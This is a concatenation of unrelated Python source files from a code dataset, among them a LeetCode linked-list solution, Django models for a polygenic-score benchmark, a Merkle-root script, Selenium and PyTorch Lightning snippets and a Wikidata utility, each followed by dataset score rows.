# self.statusBar().showMessage('not Ready')
# center the window on screen
self.center()
self.show()
def closeEvent(self, event):
reply = QtGui.QMessageBox.question(self, 'Message',
"Are you sure to quit?", QtGui.QMessageBox.Yes |
QtGui.QMessageBox.No, QtGui.QMessageBox.No)
if reply == QtGui.QMessageBox.Yes:
event.accept()
else:
event.ignore()
def center(self):
qr = self.frameGeometry()
cp = QtGui.QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
def main():
app = QtGui.QApplication(sys.argv) # Every PyQt4 application must create an application object
#print sys.argv[1:]
ex = Example1()
sys.exit(app.exec_()) # The event handling starts from this point
if __name__ == '__main__':
    main()
| 2.484375 | 2 |
python_submission/707.design-linked-list.199616840.notac.py | stavanmehta/leetcode | 0 | 12797489 | <filename>python_submission/707.design-linked-list.199616840.notac.py
class Node(object):
def __init__(self, value, nextNode=None):
self.val = value
self.next = nextNode
class MyLinkedList(object):
def __init__(self):
"""
Initialize your data structure here.
"""
self.head = None
self.size = 0
def get(self, index):
"""
Get the value of the index-th node in the linked list. If the index is invalid, return -1.
:type index: int
:rtype: int
"""
if index < 0 or index >= self.size:
return -1
counter = 0
curr = self.head
while curr:
if counter == index:
return curr.val
counter += 1
curr = curr.next
def addAtHead(self, val):
"""
Add a node of value val before the first element of the linked list. After the insertion, the new node will be the first node of the linked list.
:type val: int
:rtype: void
"""
node = Node(val)
if self.head:
node.next = self.head
self.head = node
else:
self.head = node
self.size += 1
def addAtTail(self, val):
"""
Append a node of value val to the last element of the linked list.
:type val: int
:rtype: void
"""
node = Node(val)
if not self.head:
self.head = node
else:
curr = self.head
while curr.next:
curr = curr.next
curr.next = node
self.size += 1
def addAtIndex(self, index, val):
"""
Add a node of value val before the index-th node in the linked list. If index equals to the length of linked list, the node will be appended to the end of linked list. If index is greater than the length, the node will not be inserted.
:type index: int
:type val: int
:rtype: void
"""
        if index > self.size:
            return  # index greater than the length: the node is not inserted
        if self.size == 0 or index == 0:
            self.addAtHead(val)
else:
node = Node(val)
counter = 0
curr = self.head
while curr:
if counter == index-1:
node.next = curr.next
curr.next = node
self.size += 1
return
                else:
                    counter += 1  # advance the position counter with the node
                    curr = curr.next
def deleteAtIndex(self, index):
"""
Delete the index-th node in the linked list, if the index is valid.
:type index: int
:rtype: void
"""
        if index < 0 or index >= self.size:
            return
        if index == 0:
            # Deleting the head works for any list size.
            self.head = self.head.next
            self.size -= 1
        else:
            counter = 0
            prev = None
            curr = self.head  # avoid shadowing the builtin name `next`
            while curr:
                if counter == index:
                    prev.next = curr.next
                    self.size -= 1
                    return
                else:
                    prev = curr
                    curr = curr.next
                    counter += 1
# Your MyLinkedList object will be instantiated and called as such:
# obj = MyLinkedList()
# param_1 = obj.get(index)
# obj.addAtHead(val)
# obj.addAtTail(val)
# obj.addAtIndex(index,val)
# obj.deleteAtIndex(index)
| 4.1875 | 4 |
commons.py | projectcuisines/gcm_ana | 1 | 12797490 | <reponame>projectcuisines/gcm_ana<filename>commons.py<gh_stars>1-10
# -*- coding: utf-8 -*-
"""Definitions and objects commonly used between scripts."""
MODELS = {
"ExoCAM": {
"title": "ExoCAM",
"color": "tab:blue",
},
"LMDG": {
"title": "LMD-G",
"color": "tab:red",
},
"ROCKE3D": {
"title": "ROCKE-3D",
"color": "tab:green",
},
"UM": {
"title": "UM",
"color": "tab:orange",
},
}
| 1.460938 | 1 |
main.py | MikhSol/monte_carlo_simulation_of_pi | 0 | 12797491 | <gh_stars>0
from random import random
import time
import logging
import matplotlib.pyplot as plt
logger = logging.getLogger()
logging.basicConfig(level=logging.INFO)
def estimate_pi(trials):
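    # Estimator sketch: (x, y) is uniform on the unit square, so
    # P(x^2 + y^2 <= 1) equals the quarter-circle area pi/4, hence
    # pi ~= 4 * count / trials.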
start = time.process_time()
count = 0
    for _ in range(trials):  # exactly `trials` samples, matching the divisor
x, y = random(), random()
if x * x + y * y <= 1:
count += 1
logger.info("estimate pi with " + str(trials) +
" trials processing time: " +
str(time.process_time() - start))
return 4 * count / trials
def generate_sample(trials):
in_x, in_y, out_x, out_y = [], [], [], []
    for _ in range(trials):
x, y = random(), random()
if x * x + y * y <= 1:
in_x.append(x), in_y.append(y)
else:
out_x.append(x), out_y.append(y)
return in_x, in_y, out_x, out_y
def draw_estimation(trials):
in_x, in_y, out_x, out_y = generate_sample(trials)
plt.plot(in_x, in_y, 'x', color='r')
plt.plot(out_x, out_y, 'o', color='b')
plt.show()
def main():
print(estimate_pi(10000000))
draw_estimation(10000)
if __name__ == '__main__':
    main()
| 3.0625 | 3 |
benchmark/models.py | ens-lgil/PGS_Catalog | 1 | 12797492 | <filename>benchmark/models.py
from django.db import models
from django.conf import settings
from django.core.validators import MaxValueValidator, MinValueValidator
from django.contrib.postgres.fields import DecimalRangeField
class BM_Coding(models.Model):
"""Class to describe the International Classification of Diseases used in PGS """
id = models.CharField('Code ID', max_length=30, primary_key=True)
label = models.CharField('Code Label', max_length=500, db_index=True)
type = models.CharField('Code Type', max_length=10)
class BM_Cohort(models.Model):
"""Class to describe cohorts used in samples"""
name_short = models.CharField('Cohort Short Name', max_length=100, db_index=True)
name_full = models.CharField('Cohort Full Name', max_length=1000)
def __str__(self):
return self.name_short
class BM_EFOTrait(models.Model):
"""Abstract class to hold information related to controlled trait vocabulary
(mainly to link multiple EFO to a single score)"""
id = models.CharField('Ontology Trait ID', max_length=30, primary_key=True)
label = models.CharField('Ontology Trait Label', max_length=500, db_index=True)
description = models.TextField('Ontology Trait Description', null=True)
#url = models.CharField('Ontology URL', max_length=500)
#synonyms = models.TextField('Synonyms', null=True)
#mapped_terms = models.TextField('Mapped terms', null=True)
phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_trait')
def __str__(self):
return '%s | %s '%(self.id, self.label)
@property
def display_label(self):
return '<a href="../../benchmark/%s">%s</a>'%(self.id, self.label)
#@property
#def display_id_url(self):
# return '<a href="%s">%s</a><span class="only_export">: %s</span>'%(self.url, self.id, self.url)
@property
def display_phenotype_structured(self):
data = []
        phenotype_structured = self.phenotype_structured.all()
        for phenotype in phenotype_structured:
data.append('<b>'+phenotype.id+'</b>: '+phenotype.label)
return data
def get_bm_data(self):
self.bm_data = {}
data_types = ['scores', 'cohorts', 'samples', 'ancestries']
data = {}
for type in data_types:
data[type] = set()
#for bm_performance in BM_Performance.objects.using("benchmark").filter(efotrait=self).order_by('id'):
for bm_performance in self.efotrait_performance.all():
#print(str(bm_performance))
data['scores'].add(bm_performance.score_id)
data['cohorts'].add(bm_performance.cohort)
data['samples'].add(bm_performance.sample.id)
data['ancestries'].add(bm_performance.sample.ancestry_broad)
for type in data_types:
#print(type+": "+str(list(data_count[type])))
self.bm_data[type] = list(data[type])
@property
def count_scores(self):
if not hasattr(self, 'bm_data'):
self.get_bm_data()
#scores = set()
#for bm_performance in BM_Performance.objects.using("benchmark").filter(efotrait=self).order_by('id'):
# scores.add(bm_performance.score_id)
return len(self.bm_data['scores'])
@property
def count_cohorts(self):
if not hasattr(self, 'bm_data'):
self.get_bm_data()
return len(self.bm_data['cohorts'])
#cohorts = set()
#for bm_performance in BM_Performance.objects.using("benchmark").filter(efotrait=self).order_by('id'):
# cohorts.add(bm_performance.cohort.id)
#return len(list(cohorts))
@property
def count_samples(self):
if not hasattr(self, 'bm_data'):
self.get_bm_data()
return len(self.bm_data['samples'])
@property
def cohorts_list(self):
if not hasattr(self, 'bm_data'):
self.get_bm_data()
return self.bm_data['cohorts']
@property
def ancestries_list(self):
if not hasattr(self, 'bm_data'):
self.get_bm_data()
return self.bm_data['ancestries']
#@property
#def synonyms_list(self):
# if self.synonyms:
# return self.synonyms.split(' | ')
# else:
# return []
#@property
#def mapped_terms_list(self):
# if self.mapped_terms:
# return self.mapped_terms.split(' | ')
# else:
# return []
#@property
#def category_list(self):
# return sorted(self.traitcategory.all(), key=lambda y: y.label)
#@property
#def category_labels_list(self):
# categories = self.category_list
# if len(categories) > 0:
# return [x.label for x in categories]
# else:
# return []
#@property
#def category_labels(self):
# category_labels = self.category_labels_list
# categories_data = ''
# if len(category_labels) > 0:
# categories_data = ', '.join(category_labels)
# return categories_data
#@property
#def display_category_labels(self):
# categories = self.category_list
# categories_data = ''
# if len(categories) > 0:
# category_labels = []
# for category in categories:
# v_spacing = ' class="mt-1"' if len(category_labels) > 0 else ''
# category_labels.append('<div{}><span class="trait_colour" style="background-color:{}"></span>{}</div>'.format(v_spacing,category.colour,category.label))
# categories_data = ''.join(category_labels)
# return categories_data
class BM_Demographic(models.Model):
"""Class to describe Sample fields (sample_age, followup_time) that can be point estimates or distributions"""
estimate = models.FloatField(verbose_name='Estimate (value)', null=True)
estimate_type = models.CharField(verbose_name='Estimate (type)', max_length=100, null=True, default='mean') #e.g. [mean, median]
unit = models.TextField(verbose_name='Unit', max_length=100, null=False, default='years') # e.g. [years, months, days]
range = DecimalRangeField(verbose_name='Range (values)', null=True)
range_type = models.CharField(verbose_name='Range (type)', max_length=100, default='range') # e.g. Confidence interval (ci), range, interquartile range (iqr), open range
variability = models.FloatField(verbose_name='Variability (value)', null=True)
    variability_type = models.CharField(verbose_name='Variability (type)', max_length=100, default='se') # e.g. standard deviation (sd), standard error (se)
def format_estimate(self):
if self.estimate != None:
return '{}:{}'.format(self.estimate_type, self.estimate)
return None
def format_range(self):
if self.estimate == None and self.range != None:
return '{}:{}'.format(self.range_type, str(self.range))
return None
def format_variability(self):
if self.variability != None:
return '{}:{}'.format(self.variability_type, self.variability)
return None
def format_unit(self):
if self.unit != None:
return '{}:{}'.format('unit', self.unit)
return None
def display_value(self):
l = []
helptip = '<span title="{}" class="pgs_helptip">{}</span> : {} {}'
no_helptip = '{} : {} {}'
# Estimate
e = ''
if self.estimate != None:
e += '{} : {}'.format(self.estimate_type.title(), self.estimate)
if self.range != None and self.range_type.lower() == 'ci':
e += ' {}'.format(str(self.range))
e += ' {}'.format(self.unit)
if len(e) > 0:
l.append(e)
# Variability
v = None
if self.variability != None:
type_desc = self.variability_type_desc()
if (type_desc):
v = helptip.format(type_desc, self.variability_type.title(), self.variability, self.unit)
else:
v = no_helptip.format(self.variability_type.title(), self.variability, self.unit)
if v != None:
l.append(v)
# Range
r = None
if '[' not in e:
if self.range != None:
type_desc = self.range_type_desc()
if (type_desc):
r = helptip.format(type_desc, self.range_type.title(), str(self.range), self.unit)
else:
r = no_helptip.format(self.range_type.title(), str(self.range), self.unit)
if r != None:
l.append(r)
if (len(l) == 1):
return l[0]
elif (len(l) > 1):
return '<ul><li>'+'</li><li>'.join(l)+'</li></ul>'
else:
return ''
def display_values_dict(self):
l = {}
# Estimate
estimate = ''
if self.estimate != None:
estimate = str(self.estimate)
if self.range != None and self.range_type.lower() == 'ci':
estimate += str(self.range)
if estimate:
l[self.estimate_type] = estimate
# Range
if self.range != None and '[' not in estimate:
l[self.range_type] = str(self.range)
# Variability
if self.variability != None:
l[self.variability_type] = self.variability
# Unit
if self.unit != None:
l['unit'] = self.unit
return l
def range_type_desc(self):
desc_list = {
'ci': 'Confidence interval',
'iqr': 'Interquartile range'
}
if self.range_type.lower() in desc_list:
return desc_list[self.range_type.lower()]
def variability_type_desc(self):
desc_list = {
'sd': 'Standard Deviation',
'sd (cases)': 'Standard Deviation',
'se': 'Standard Error',
}
if self.variability_type.lower() in desc_list:
return desc_list[self.variability_type.lower()]
class BM_Sample(models.Model):
"""Class to describe samples used in variant associations and PGS training/testing"""
# Sample Information
## Numbers
sample_number = models.IntegerField('Number of Individuals', validators=[MinValueValidator(1)])
sample_cases = models.IntegerField('Number of Cases', null=True)
sample_controls = models.IntegerField('Number of Controls', null=True)
# Sample sex type information
SAMPLE_SEX_CHOICES = [
('Both', 'Both'),
('Male', 'Male'),
('Female', 'Female')
]
sample_sex = models.CharField(max_length=6,
choices=SAMPLE_SEX_CHOICES,
default='Both',
verbose_name='Sample Sex'
)
sample_age = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of', null=True)
## Description
phenotyping_free = models.TextField('Detailed Phenotype Description', null=True)
phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_sample')
followup_time = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of', null=True)
## Ancestry
ancestry_broad = models.CharField('Broad Ancestry Category', max_length=100)
ancestry_free = models.TextField('Ancestry (e.g. French, Chinese)', null=True)
ancestry_country = models.TextField('Country of Recruitment', null=True)
ancestry_additional = models.TextField('Additional Ancestry Description', null=True)
## Cohorts/Sources
#source_GWAS_catalog = models.CharField('GWAS Catalog Study ID (GCST...)', max_length=20, null=True)
#source_PMID = models.CharField('Source PubMed ID (PMID) or doi', max_length=100, null=True)
cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_sample')
#cohorts_additional = models.TextField('Additional Sample/Cohort Information', null=True)
def __str__(self):
return 'Sample: {}'.format(str(self.pk))
@property
def sample_cases_percent(self):
if self.sample_cases != None:
percent = (self.sample_cases / self.sample_number) * 100
return round(percent,2)
else:
return None
def display_samples_for_table(self, show_percent_cases=False):
div_id = "sample_"+str(self.pk)
sstring = ''
if self.sample_cases != None:
percent_cases = ''
if show_percent_cases:
percent_cases = f' ({self.sample_cases_percent}%)'
sstring += '<div><a class="toggle_table_btn pgs_helptip" id="'+div_id+'" title="Click to show/hide the details">{:,} individuals <i class="fa fa-plus-circle"></i></a></div>'.format(self.sample_number)
sstring += '<div class="toggle_list" id="list_'+div_id+'">'
sstring += '<span class="only_export">[</span>'
sstring += '<ul>\n<li>{:,} cases{}</li>\n'.format(self.sample_cases, percent_cases)
if self.sample_controls != None:
sstring += '<li><span class="only_export">, </span>'
sstring += '{:,} controls</li>'.format(self.sample_controls)
sstring += '</ul>'
sstring += '<span class="only_export">]</span>'
sstring += '</div>'
else:
sstring += '{:,} individuals'.format(self.sample_number)
return sstring
@property
def display_ancestry(self):
if self.ancestry_free in ['NR', '', None]:
return self.ancestry_broad
else:
return '{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free)
@property
def display_ancestry_inline(self):
if self.ancestry_free in ['NR', '', None]:
return self.ancestry_broad
else:
return '{} ({})'.format(self.ancestry_broad, self.ancestry_free)
class BM_Performance(models.Model):
"""Class to hold performance/accuracy metrics for a PGS and a set of samples"""
# Links to related objects
score_id = models.CharField('Polygenic Score (PGS) ID', max_length=30, db_index=True)
sample = models.ForeignKey(BM_Sample, on_delete=models.PROTECT, verbose_name='PGS Sample',
related_name='sample_performance') # Samples used for evaluation
efotrait = models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT, verbose_name='EFO Trait', related_name="efotrait_performance")
cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_performance')
def __str__(self):
return '%s | %s | %s'%(self.efotrait.id, self.score_id, self.cohort.name_short)
class Meta:
get_latest_by = 'num'
@property
def effect_sizes_list(self):
return self.get_metric_data('Effect Size')
@property
def class_acc_list(self):
return self.get_metric_data('Classification Metric')
@property
def othermetrics_list(self):
return self.get_metric_data('Other Metric')
@property
def performance_metrics(self):
perf_metrics = {}
effect_sizes_list = self.effect_sizes_list
effect_sizes_data = []
if effect_sizes_list:
for effect_size in self.effect_sizes_list:
effect_sizes_data.append({'labels': effect_size[0], 'value': effect_size[1]})
perf_metrics['effect_sizes'] = effect_sizes_data
class_acc_list = self.class_acc_list
class_acc_data = []
if class_acc_list:
for class_acc in self.class_acc_list:
class_acc_data.append({'labels': class_acc[0], 'value': class_acc[1]})
perf_metrics['class_acc'] = class_acc_data
othermetrics_list = self.othermetrics_list
othermetrics_data = []
if othermetrics_list:
for othermetrics in othermetrics_list:
othermetrics_data.append({'labels': othermetrics[0], 'value': othermetrics[1]})
perf_metrics['othermetrics'] = othermetrics_data
return perf_metrics
def get_metric_data(self, metric_type):
""" Generic method to extract and format the diverse metric data"""
# Using all and filter afterward uses less SQL queries than filtering directly on the queryset
metrics = self.performance_metric.all()
if metrics:
l = []
for m in metrics:
if (m.type == metric_type):
l.append((m.name_tuple(), m.display_value()))
if len(l) != 0:
return l
return None
class BM_Metric(models.Model):
"""Class to hold metric type, name, value and confidence intervals of a performance metric"""
performance = models.ForeignKey(BM_Performance, on_delete=models.CASCADE, verbose_name='PGS Performance Metric (PPM)', related_name="performance_metric")
    # Stored values match the default below and the comparisons in
    # Performance.get_metric_data (which filter on the full names).
    TYPE_CHOICES = [
        ('Effect Size', 'Effect Size'),
        ('Classification Metric', 'Classification Metric'),
        ('Other Metric', 'Other Metric')
    ]
type = models.CharField(max_length=40,
choices=TYPE_CHOICES,
default='Other Metric',
db_index=True
)
name = models.CharField(verbose_name='Performance Metric Name', max_length=100, null=False) # ex: "Odds Ratio"
name_short = models.CharField(verbose_name='Performance Metric Name (Short)', max_length=25, null=True) # ex: "OR"
estimate = models.FloatField(verbose_name='Estimate', null=False)
unit = models.TextField(verbose_name='Units of the effect size', max_length=100, blank = False)
ci = DecimalRangeField(verbose_name='95% Confidence Interval', null=True)
se = models.FloatField(verbose_name='Standard error of the effect', null=True)
def __str__(self):
if self.ci != None:
s = '{} {}'.format(self.estimate, self.ci)
else:
s = '{}'.format(self.estimate)
if (self.name_short):
return '%s (%s): %s'%(self.name, self.name_short, s)
else:
return '%s: %s'%(self.name, s)
def display_value(self):
if self.ci != None:
s = '{} {}'.format(self.estimate, self.ci)
else:
s = '{}'.format(self.estimate)
return s
def name_tuple(self):
if self.name_short is None:
return (self.name, self.name)
else:
return (self.name, self.name_short)
| 2.359375 | 2 |
dataset.py | sehandev/transformer-pytorch | 0 | 12797493 | # Standard
# PIP
from torch.utils.data import DataLoader
from pytorch_lightning import LightningDataModule
from torchtext.datasets import WikiText2
# Custom
class CustomDataModule(LightningDataModule):
def __init__(
self,
batch_size=1,
num_workers=0,
):
super().__init__()
self.batch_size = batch_size
self.num_workers = num_workers
def setup(
self,
stage=None,
):
# Assign train & val datasets
if stage == "fit" or stage is None:
self.train_dataset = WikiText2(split='train')
self.valid_dataset = WikiText2(split='valid')
# Assign test dataset
if stage == "test" or stage is None:
self.test_dataset = WikiText2(split='test')
def train_dataloader(self):
return DataLoader(
dataset=self.train_dataset,
batch_size=self.batch_size,
shuffle=True,
num_workers=self.num_workers,
)
def val_dataloader(self):
return DataLoader(
dataset=self.valid_dataset,
batch_size=self.batch_size,
            shuffle=False,  # validation data is typically not shuffled
num_workers=self.num_workers,
)
def test_dataloader(self):
return DataLoader(
dataset=self.test_dataset,
batch_size=self.batch_size,
shuffle=False,
num_workers=self.num_workers,
)
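# Minimal usage sketch (assumes a LightningModule named `model`; the Trainer
# arguments are illustrative only):
#   import pytorch_lightning as pl
#   dm = CustomDataModule(batch_size=32, num_workers=4)
#   trainer = pl.Trainer(max_epochs=1)
#   trainer.fit(model, datamodule=dm)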
| 2.671875 | 3 |
test/test_field.py | aimagelab/speaksee | 29 | 12797494 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import unittest
import speaksee.data as data
import numpy as np
import torch
'''class TestImageField(object):
def test_preprocessing(self):
field = data.ImageField()
image = ''
expected_image = ''
assert field.preprocess(image) == expected_image
'''
class TestTextField(object):
def test_pad(self):
# Default case.
field = data.TextField()
minibatch = [["a", "sentence", "of", "data", "."],
["yet", "another"],
["one", "last", "sent"]]
expected_padded_minibatch = [["a", "sentence", "of", "data", "."],
["yet", "another", "<pad>", "<pad>", "<pad>"],
["one", "last", "sent", "<pad>", "<pad>"]]
expected_lengths = [5, 2, 3]
assert field.pad(minibatch) == expected_padded_minibatch
field = data.TextField(include_lengths=True)
assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths)
# Test fix_length properly truncates and pads.
field = data.TextField(fix_length=3)
minibatch = [["a", "sentence", "of", "data", "."],
["yet", "another"],
["one", "last", "sent"]]
expected_padded_minibatch = [["a", "sentence", "of"],
["yet", "another", "<pad>"],
["one", "last", "sent"]]
expected_lengths = [3, 2, 3]
assert field.pad(minibatch) == expected_padded_minibatch
field = data.TextField(fix_length=3, include_lengths=True)
assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths)
field = data.TextField(fix_length=3, truncate_first=True)
expected_padded_minibatch = [["of", "data", "."],
["yet", "another", "<pad>"],
["one", "last", "sent"]]
assert field.pad(minibatch) == expected_padded_minibatch
# Test init_token is properly handled.
field = data.TextField(fix_length=4, init_token="<bos>")
minibatch = [["a", "sentence", "of", "data", "."],
["yet", "another"],
["one", "last", "sent"]]
expected_padded_minibatch = [["<bos>", "a", "sentence", "of"],
["<bos>", "yet", "another", "<pad>"],
["<bos>", "one", "last", "sent"]]
expected_lengths = [4, 3, 4]
assert field.pad(minibatch) == expected_padded_minibatch
field = data.TextField(fix_length=4, init_token="<bos>", include_lengths=True)
assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths)
# Test init_token and eos_token are properly handled.
field = data.TextField(init_token="<bos>", eos_token="<eos>")
minibatch = [["a", "sentence", "of", "data", "."],
["yet", "another"],
["one", "last", "sent"]]
expected_padded_minibatch = [
["<bos>", "a", "sentence", "of", "data", ".", "<eos>"],
["<bos>", "yet", "another", "<eos>", "<pad>", "<pad>", "<pad>"],
["<bos>", "one", "last", "sent", "<eos>", "<pad>", "<pad>"]]
expected_lengths = [7, 4, 5]
assert field.pad(minibatch) == expected_padded_minibatch
field = data.TextField(init_token="<bos>", eos_token="<eos>", include_lengths=True)
assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths)
def test_decode(self):
def test_all_dtypes(word_idxs, expected_output):
assert field.decode(word_idxs) == expected_output
assert field.decode(np.asarray(word_idxs)) == expected_output
assert field.decode(torch.from_numpy(np.asarray(word_idxs))) == expected_output
class MyVocab(object):
def __init__(self, eos_token):
self.itos = {0: 'a',
1: 'b',
2: eos_token,
3: 'c'}
field = data.TextField()
field.vocab = MyVocab(field.eos_token)
# Empty captions (not tested for PyTorch tensors)
word_idxs = []
expected_output = ''
assert field.decode(word_idxs) == expected_output
assert field.decode(np.asarray(word_idxs)) == expected_output
word_idxs = [[]]
expected_output = ['', ]
assert field.decode(word_idxs) == expected_output
assert field.decode(np.asarray(word_idxs)) == expected_output
# Single caption
word_idxs = [0, 3, 2, 1]
expected_output = 'a c'
test_all_dtypes(word_idxs, expected_output)
# Batch of captions
word_idxs = [[0, 3, 2, 1],
[3, 3, 2, 1],
[2, 1, 1, 1]]
expected_output = ['a c', 'c c', '']
test_all_dtypes(word_idxs, expected_output)
| 2.8125 | 3 |
swc-api/config.py | aehaynes/btcpokerstats | 0 | 12797495 | <gh_stars>0
SWC_USERNAME = ['Irresonsibl','Irrsponsible', 'Irresponsibl']
SWC_PASSWORD = '<PASSWORD>'
SLEEP_MILLISECONDS = 750
GET_SESSION_URL = 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18'
USER_AGENT_STR = 'python-requests/1.1.0 CPython/2.7.3 Windows/7'
SERVICE_URL = 'sealswithclubs.eu'#'https://sealswithclubs.eu'
SERVICE_PORT = 8088
MEANINGFUL_COLORS_URL = 'https://sealswithclubs.eu/meaningfulcolors.php'
SWC_CERT_FILEPATH = 'sealswithclubs.eu.crt'
END_STR = '\x00'
UNNAMED_HAND_IDENTIFIER = 'UNDEFINED'
SITTINGOUT_STR = 'Sitting Out'
BASE_DIR = '/home/nonroot/Projects/' #Change this path
HH_PATH = BASE_DIR + 'swc-api/outdir/'
DB_INFO = ['swc','postgres', 'postgres']
CHAT_PATH = BASE_DIR + 'swc-api/Log Archives/'
| 1.632813 | 2 |
merkle.py | makiolo/root_merkle_tree | 2 | 12797496 | <filename>merkle.py<gh_stars>1-10
'''
Generate root merkle tree hash in python.
I use https://github.com/bitcoin/bitcoin as reference:
BlockBuildMerkleTree --> Satoshi implmentation
BlockMerkleRoot ---> new bitcoin core implementation
'''
import pandas as pd
from hashlib import sha256
from io import StringIO
# h( h(1) + h(2) )
# 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8
# h( h(3) + h(4) )
# b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2
# h( h( h(1) + h(2) ) + h( h(3) + h(4) ) )
# 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766
dataset = StringIO("""\
transaction1_serialized_A_B_3
transaction2_serialized_B_C_1
transaction3_serialized_D_E_2
transaction4_serialized_E_B_1
transaction5_serialized_C_B_2
transaction6_serialized_D_A_1
""")
df = pd.read_csv(dataset, encoding='utf-8', header=None)
hashes = df.iloc[:, 0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist()
while len(hashes) > 1:
if len(hashes) % 2 != 0:
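        # Odd number of nodes at this level: duplicate the last hash, as the
        # Bitcoin implementation referenced above does.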
hashes.append(hashes[-1])
i = 0
j = 0
while i + 1 < len(hashes):
hashes[j] = sha256(str(hashes[i] + hashes[i + 1]).encode('utf-8')).hexdigest()
i += 2
j += 1
hashes = hashes[:int(len(hashes) / 2)]
# tree condensed in a hash
print(hashes[0])
| 2.640625 | 3 |
astro345_fall2015/astro345_hw12.py | johnnydevriese/wsu_courses | 0 | 12797497 | <filename>astro345_fall2015/astro345_hw12.py
import matplotlib.pyplot as plt
from pylab import *
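# Each curve below is hydrostatic pressure P = rho * g * h for one body, with
# density rho in kg/m^3, surface gravity g in m/s^2 and depth h in meters;
# f(x) draws a constant 4 GPa reference line.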
def moon(x):
P = 3340 * 1.622 * x
return P
def mars(x):
P = 3930 * 3.711 * x
return P
def earth(x):
P = 5510 * 9.807 * x
return P
def jupiter(x):
P = 1330 * 24.79 * x
return P
def f(x):
P = 4e9
return ones(shape(x)) * P
x = arange(0,3e6,100)
y_max = earth(3e6)
plt.xlabel('Depth Inside Planet (meters)')
plt.ylabel('Pressure Inside Planet (Pascals)')
plt.title('Depth vs Pressure for Planets')
plt.plot(x,f(x))
plt.plot(x,moon(x), label='Moon')
plt.plot(x,mars(x), label='Mars')
plt.plot(x,earth(x), label='Earth')
plt.plot(x,jupiter(x), label='Jupiter')
plt.axis([0,3e6,0,y_max])
plt.legend()
#~ plt.plot([1,2,3,4])
#~ plt.ylabel('some numbers')
plt.show()
| 3.25 | 3 |
solutions/0279.Perfect_Squares/python_solution.py | garyzccisme/leetcode | 2 | 12797498 | # DP
class Solution:
def numSquares(self, n: int) -> int:
squares = [x ** 2 for x in range(1, int(n ** 0.5) + 1)]
dp = [0] + [float('inf')] * n
for i in range(1, n + 1):
for square in squares:
if i < square:
break
dp[i] = min(dp[i], dp[i - square] + 1)
return dp[-1]
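# Example: Solution().numSquares(12) == 3, since 12 = 4 + 4 + 4.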
# Greedy DFS 1
class Solution:
def numSquares(self, n: int) -> int:
squares = [x ** 2 for x in range(int(n ** 0.5), 0, -1)]
self.ans = float('inf')
self.dfs(n, 0, squares)
return self.ans
def dfs(self, n, count, squares):
if n == 0:
self.ans = count
else:
for i, square in enumerate(squares):
# Find the biggest square that is no larger than n
# If current count is reaching second best answer, prune it
if square <= n and count + 1 < self.ans:
self.dfs(n - square, count + 1, squares[i:])
# Greedy DFS 2
class Solution:
def numSquares(self, n):
def is_divided_by(n, count):
"""
return: true if "n" can be decomposed into "count" number of perfect square numbers.
e.g. n=12, count=3: true.
n=12, count=2: false
"""
if count == 1:
return n in square_nums
for k in square_nums:
if is_divided_by(n - k, count - 1):
return True
return False
square_nums = set([i * i for i in range(1, int(n ** 0.5) + 1)])
for count in range(1, n + 1):
if is_divided_by(n, count):
return count
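
# Hedged sanity check (added, not part of the original solution file). At
# module scope `Solution` resolves to the last definition (Greedy DFS 2);
# since 12 = 4 + 4 + 4 and 13 = 4 + 9, the expected answers are 3 and 2.
if __name__ == "__main__":
    assert Solution().numSquares(12) == 3
    assert Solution().numSquares(13) == 2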
| 3.09375 | 3 |
codigo_das_aulas/aula_10/aula_10_08.py | VeirichR/curso-python-selenium | 234 | 12797499 |
from selenium.webdriver import Firefox
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.expected_conditions import (
url_contains,
url_matches
)
url = 'https://selenium.dunossauro.live/aula_10_c.html'
browser = Firefox()
browser.get(url)
wdw = WebDriverWait(browser, 10)
links = browser.find_elements_by_css_selector('.body_b a')
links[1].click()
wdw.until(
url_contains('selenium'),
)
wdw.until(
url_matches('http.*live'),
)
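
# Hedged note (added): WebDriverWait polls its condition every 0.5 s (the
# Selenium default) for up to the 10 s configured above. url_matches takes a
# regular expression, so 'http.*live' accepts any current URL containing
# "http" followed somewhere later by "live".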
| 2.703125 | 3 |
LexData/utils.py | CedricTarbouriech/LexData | 16 | 12797500 | import functools
import json
from datetime import datetime
from typing import Any, Dict
from .wikidatasession import WikidataSession
@functools.lru_cache()
def getPropertyType(propertyId: str):
repo = WikidataSession()
query = {
"action": "query",
"format": "json",
"prop": "revisions",
"titles": "Property:" + propertyId,
"rvprop": "content",
}
DATA = repo.get(query)
jsonstr = list(DATA["query"]["pages"].values())[0]["revisions"][0]["*"]
content = json.loads(jsonstr)
return content["datatype"]
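
# Hedged usage sketch (added; P569 is a real Wikidata property, "date of
# birth", whose datatype is "time"):
#
#     >>> getPropertyType("P569")
#     'time'
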
def buildDataValue(datatype: str, value):
if datatype in [
"wikibase-lexeme",
"wikibase-form",
"wikibase-sense",
"wikibase-item",
"wikibase-property",
]:
if type(value) == dict:
return {"value": value, "type": "wikibase-entity"}
elif type(value) == str:
value = {"entity-type": datatype[9:], "id": value}
return {"value": value, "type": "wikibase-entity"}
else:
raise TypeError(
f"Can not convert type {type(value)} to datatype {datatype}"
)
elif datatype in [
"string",
"tabular-data",
"geo-shape",
"url",
"musical-notation",
"math",
"commonsMedia",
]:
if type(value) == dict:
return {"value": value, "type": "string"}
